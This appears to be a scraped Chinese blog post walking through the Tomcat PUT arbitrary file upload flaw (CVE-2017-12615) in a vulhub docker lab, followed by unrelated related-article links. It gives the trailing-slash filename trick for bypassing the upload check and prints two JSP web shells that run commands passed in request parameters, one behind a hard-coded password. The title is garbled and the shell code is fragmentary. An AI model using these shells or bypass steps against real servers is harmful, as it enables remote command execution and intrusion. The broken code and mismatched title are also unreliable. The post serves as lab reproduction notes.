dockers log查询dockers的文件_Tomcat PUT方法任意文件上传
漏洞背景:
tomcat(7.0.0-7.8.1)服务器,开启了HTTP PUT请求方法,web.xml文件中的readonly值设置未false
漏洞环境:
使用vulhub环境,直接dockers安装
安装成功:
安装vulhub详见:
https://vulhub.org/#/index/
漏洞利用:
直接抓包进行修改
1、修改为put方法
2、写入shell
测试是否开启PUT方法
写入shell(注意需要在文件名后面加上一个/进行过滤绕过,未加/会报错,如果写入一个txt文件则不用加/且不会报错)
测试结果
shell(linux下使用,我之前用了一个Windows的,执行报错)
"java" import=public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try { Process pro = Runtime.getRuntime().exec(c); BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); String temp = null; while ((temp = buf.readLine()) != null) { line.append(temp + "\\n"); } buf.close(); } catch (Exception e) { line.append(e.getMessage()); } return line.toString();} %> if(
else{out.println(":-)");}%>
shell(windows,未使用过,一个大佬的复现使用的)
if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[1024]; out.print("
"
); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("
}
%>
后续再试着使用其它的shell及工具(CVE-2017-12615漏洞利用工具)进行测试,提高效率
dockers log查询dockers的文件_Tomcat PUT方法任意文件上传相关推荐
- 向web服务器传文件,c++实现向web服务器上传文件
[实例简介] vs2013 c++实现上传的客户端,服务端为java写的web工程,模拟post方法,可以上传大文件 [实例截图] [核心代码] c向web服务器上传文件 └── c++ 向web服务 ...
- 10个MySQL加载数据内文件示例以将文本文件数据上传到表
10个MySQL加载数据内文件示例以将文本文件数据上传到表 如果文本文件中有数据,则可以轻松地将它们上载到数据库中的一个或多个表. 在MySQL数据库(或MariaDB)中,使用" load ...
- vue+elementui 同时有上传文件和批量上传文件功能,上传文件或批量上传文件后必须刷新才能再次上传文件
报错描述: 使用element-ui的上传文件组件写一个批量上传和上传文件,但是发现每次上传文件后或者批量上传文件后,不能再次上传文件或者批量上传文件.只有进入页面第一次点击上传文件或者批量上传文件才 ...
- java下载文件到服务器_java代码实现上传文件到文档服务器、下载文档服务器文件...
需要完成下载->修改->上传这三个步骤 平台有提供对应的api吗? /** 首先我们来理解下关于文档的api 文档相关api都在这2个package下面 package :com.just ...
- vue-simple-uploader实现多文件/文件夹以及可拖拽上传
vue-simple-uploader的简单使用 1.效果图展示 2.安装 3.vue2使用(vue3使用会报错) 4.代码 vue-simple-uploader是基于simple-uploader ...
- Python监控目录文件夹,并使用SFTP上传目录及文件到linux服务器
Python 扫描监控本地文件夹并进行超大文件上传 方案1:WebUploader大文件分块多线程并发上传 方案2:watchdog目录文件夹监控,paramiko STFP上传服务器 方案3:优化2 ...
- JSP中的文件操作:数据流、File类、文件浏览、目录操作、上传下载
文件可以永久地存储信息,从本质上讲文件就是存放在盘上的一系列数据的集合.应用程序如果想长期保存数据,就必须将数据存储到文件中,这就涉及到文件的操作.而在编写网站应用程序的过程中,有许多地方要对文件 ...
- java web文件夹_JAVA WEB项目文件夹上传下载解决方案
这里只写后端的代码,基本的思想就是,前端将文件分片,然后每次访问上传接口的时候,向后端传入参数:当前为第几块文件,和分片总数 下面直接贴代码吧,一些难懂的我大部分都加上注释了: 上传文件实体类: 看得 ...
- aws php 上传文件 限制大小_单个文件大小 上传百度云盘 微信发送 有大小限制 怎么破?...
问题描述 百度云盘,单个文件20G,如果一个文件太大,就不能上传成功. 微信发送文件,单个文件100Mb,如果太大,就无法发送. QQ也有类似限制 如果解决呢??? 问题解决 使用rar文件压缩,或者 ...
最新文章
- 一款强大而实用的图片去水印神器
- ABP学习 解决:Update-Database : 无法将“Update-Database”项识别为 cmdlet、函数、脚本文件或可运行程序的名称的问题
- python处理excel视频-从零基础开始用Python处理Excel数据 视频教程
- flirtlib 测试过程
- java spring框架 注解_详解Java的Spring框架中的注解的用法
- 红罐王老吉品牌定位战略制定过程详解
- java获取公网ip_动态IP变固定IP,国内IP变海外IP,助力企业数据传输提高工作效率...
- redis解决了分布式系统的session一致性问题
- 学习SpringBoot(1)入门及简单的配置
- Oracle服务的作用
- 贝叶斯优化核极限学习机KELM用于回归预测
- 天堂2 服务器修改,服务器技术交流_新天堂2-战乱的序幕架设教程_-921根据地_只做有质量的游戏 - Powered by Discuz!...
- 网站制作必备-在线按钮生成器,LOGO生成器,背景生成器,ICO图标生成器,和许多在线小工具...
- sql server 常用工具
- RK3399 修改android桌面图标默认大小
- linux 执行 ktr脚本,kettle在linux下面用于shell脚本执行:转换或者作业
- 从微信公众号获取关注名单
- spring 定时器时间配置
- 基于人工智能与大数据的城市治安防控体系建设方案-2022-01版
- 外贸企业邮箱哪个好用,常用的外贸邮件系统有哪些?
热门文章
- 一张图学会数据库迁云最佳路径
- 从质疑到成为必选项,低代码技术发展及 2022 展望
- 数据结构是如何装入 CPU 寄存器的?
- i 智慧 | IBM存储:全面贯彻新存储的“智慧之道”
- Cloud一分钟 |格力电器营收比去年增长500亿元; 红黄蓝加盟停不下来;中美双方同意停止相互加征新的关税...
- 云漫圈 | 革命版互联网公司虐恋大戏,周一拿去怼业务!
- 调用某个按钮事件_Event 对象之事件句柄 (Event Handlers)
- quill鼠标悬浮 出现提示_CHERRY MC8.1鼠标评测:超前设计延续军火箱信仰
- java中img属性_如果html img的src属性无效,请输入默认图像?
- location 拦截所有_电脑广告拦截软件 Adguard Premium